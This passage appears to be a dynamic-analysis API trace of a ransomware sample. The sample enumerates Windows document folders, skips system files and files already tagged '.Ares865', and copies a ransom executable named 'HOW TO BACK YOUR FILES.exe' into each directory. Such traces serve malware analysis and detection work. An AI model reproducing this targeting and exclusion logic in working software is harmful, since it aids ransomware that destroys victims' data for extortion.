ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53342a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53342a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.947] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.947] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.947] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.947] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.947] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0089.947] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0089.947] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0089.947] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\*") returned 30 [0089.947] lstrcpyW (in: lpString1=0x2cce43a, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0089.947] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0089.947] lstrlenW (lpString="Ares865") returned 7 [0089.947] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.947] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498af5a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x498af5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.947] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.947] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0089.947] lstrcmpiW (lpString1="My Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.947] lstrcmpiW (lpString1="My Music", lpString2="aoldtz.exe") returned 1 [0089.947] lstrcmpiW (lpString1="My Music", lpString2=".") returned 1 [0089.947] lstrcmpiW (lpString1="My Music", lpString2="..") returned 1 [0089.947] lstrcmpiW (lpString1="My Music", lpString2="windows") returned -1 [0089.947] lstrcmpiW (lpString1="My Music", lpString2="bootmgr") returned 1 [0089.947] lstrcmpiW (lpString1="My Music", lpString2="temp") returned -1 [0089.947] lstrcmpiW (lpString1="My Music", lpString2="pagefile.sys") returned -1 [0089.947] lstrcmpiW (lpString1="My Music", lpString2="boot") returned 1 [0089.947] lstrcmpiW (lpString1="My Music", lpString2="ids.txt") returned 1 [0089.948] lstrcmpiW (lpString1="My Music", lpString2="ntuser.dat") returned -1 [0089.948] lstrcmpiW (lpString1="My Music", lpString2="perflogs") returned -1 [0089.948] lstrcmpiW (lpString1="My Music", lpString2="MSBuild") returned 1 [0089.948] lstrlenW (lpString="My Music") returned 8 [0089.948] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\desktop.ini.Ares865") returned 48 [0089.948] lstrcpyW (in: lpString1=0x2cce43a, lpString2="My Music" | out: lpString1="My Music") returned="My Music" [0089.948] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0089.948] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4c) returned 0x2ed8f8 [0089.948] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0089.948] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2="aoldtz.exe") returned 1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2=".") returned 1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2="..") returned 1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2="windows") returned -1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2="bootmgr") returned 1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2="temp") returned -1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2="pagefile.sys") returned -1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2="boot") returned 1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2="ids.txt") returned 1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2="ntuser.dat") returned -1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2="perflogs") returned -1 [0089.948] lstrcmpiW (lpString1="My Pictures", lpString2="MSBuild") returned 1 [0089.948] lstrlenW (lpString="My Pictures") returned 11 [0089.948] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Music") returned 37 [0089.948] lstrcpyW (in: lpString1=0x2cce43a, lpString2="My Pictures" | out: lpString1="My Pictures") returned="My Pictures" [0089.948] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0089.948] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2df710 [0089.948] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0089.948] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0089.948] lstrcmpiW (lpString1="My Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.948] lstrcmpiW (lpString1="My Videos", lpString2="aoldtz.exe") returned 1 [0089.948] lstrcmpiW (lpString1="My Videos", lpString2=".") returned 1 [0089.948] lstrcmpiW (lpString1="My Videos", lpString2="..") returned 1 [0089.948] lstrcmpiW (lpString1="My Videos", lpString2="windows") returned -1 [0089.948] lstrcmpiW (lpString1="My Videos", lpString2="bootmgr") returned 1 [0089.948] lstrcmpiW (lpString1="My Videos", lpString2="temp") returned -1 [0089.948] lstrcmpiW (lpString1="My Videos", lpString2="pagefile.sys") returned -1 [0089.949] lstrcmpiW (lpString1="My Videos", lpString2="boot") returned 1 [0089.949] lstrcmpiW (lpString1="My Videos", lpString2="ids.txt") returned 1 [0089.949] lstrcmpiW (lpString1="My Videos", lpString2="ntuser.dat") returned -1 [0089.949] lstrcmpiW (lpString1="My Videos", lpString2="perflogs") returned -1 [0089.949] lstrcmpiW (lpString1="My Videos", lpString2="MSBuild") returned 1 [0089.949] lstrlenW (lpString="My Videos") returned 9 [0089.949] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures") returned 40 [0089.949] lstrcpyW (in: lpString1=0x2cce43a, lpString2="My Videos" | out: lpString1="My Videos") returned="My Videos" [0089.949] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0089.949] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4e) returned 0x2ed798 [0089.949] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0089.949] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0089.949] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.949] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0089.949] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Documents\\My Videos", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Documents\\My Videos") returned="C:\\Users\\All Users\\Documents\\My Videos" [0089.949] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed798 | out: hHeap=0x2b0000) returned 1 [0089.949] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0089.949] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Videos") returned 38 [0089.949] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Documents\\My Videos" | out: lpString1="C:\\Users\\All Users\\Documents\\My Videos") returned="C:\\Users\\All Users\\Documents\\My Videos" [0089.949] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.949] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Documents\\My Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\documents\\my videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.950] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.950] GetLastError () returned 0x0 [0089.950] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.950] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.950] CloseHandle (hObject=0x120) returned 1 [0089.950] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.950] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.950] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\My Videos\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.951] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.951] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.951] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.951] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.951] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.951] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.951] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.951] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.951] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0089.951] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0089.951] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0089.951] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Videos\\*") returned 40 [0089.951] lstrcpyW (in: lpString1=0x2cce44e, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0089.951] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0089.951] lstrlenW (lpString="Ares865") returned 7 [0089.951] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.951] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x494f7340, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x494f7340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.951] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.951] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0089.951] lstrcmpiW (lpString1="Sample Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.952] lstrcmpiW (lpString1="Sample Videos", lpString2="aoldtz.exe") returned 1 [0089.952] lstrcmpiW (lpString1="Sample Videos", lpString2=".") returned 1 [0089.952] lstrcmpiW (lpString1="Sample Videos", lpString2="..") returned 1 [0089.952] lstrcmpiW (lpString1="Sample Videos", lpString2="windows") returned -1 [0089.952] lstrcmpiW (lpString1="Sample Videos", lpString2="bootmgr") returned 1 [0089.952] lstrcmpiW (lpString1="Sample Videos", lpString2="temp") returned -1 [0089.952] lstrcmpiW (lpString1="Sample Videos", lpString2="pagefile.sys") returned 1 [0089.952] lstrcmpiW (lpString1="Sample Videos", lpString2="boot") returned 1 [0089.952] lstrcmpiW (lpString1="Sample Videos", lpString2="ids.txt") returned 1 [0089.952] lstrcmpiW (lpString1="Sample Videos", lpString2="ntuser.dat") returned 1 [0089.952] lstrcmpiW (lpString1="Sample Videos", lpString2="perflogs") returned 1 [0089.952] lstrcmpiW (lpString1="Sample Videos", lpString2="MSBuild") returned 1 [0089.952] lstrlenW (lpString="Sample Videos") returned 13 [0089.952] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Videos\\desktop.ini.Ares865") returned 58 [0089.952] lstrcpyW (in: lpString1=0x2cce44e, lpString2="Sample Videos" | out: lpString1="Sample Videos") returned="Sample Videos" [0089.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0089.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6a) returned 0x2d2ef0 [0089.952] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0089.952] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0089.952] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.952] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0089.952] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Documents\\My Videos\\Sample Videos", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Documents\\My Videos\\Sample Videos") returned="C:\\Users\\All Users\\Documents\\My Videos\\Sample Videos" [0089.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0089.952] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Videos\\Sample Videos") returned 52 [0089.952] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Documents\\My Videos\\Sample Videos" | out: lpString1="C:\\Users\\All Users\\Documents\\My Videos\\Sample Videos") returned="C:\\Users\\All Users\\Documents\\My Videos\\Sample Videos" [0089.952] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.952] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Documents\\My Videos\\Sample Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\documents\\my videos\\sample videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.953] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.953] GetLastError () returned 0x0 [0089.953] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.953] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.953] CloseHandle (hObject=0x120) returned 1 [0089.953] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.953] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.953] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\My Videos\\Sample Videos\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.953] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.953] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.953] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.953] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.954] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.954] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.954] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.954] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.954] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x49993de0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0089.954] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0089.954] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0089.954] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Videos\\Sample Videos\\*") returned 54 [0089.954] lstrcpyW (in: lpString1=0x2cce46a, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0089.954] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0089.954] lstrlenW (lpString="Ares865") returned 7 [0089.954] lstrcmpiW 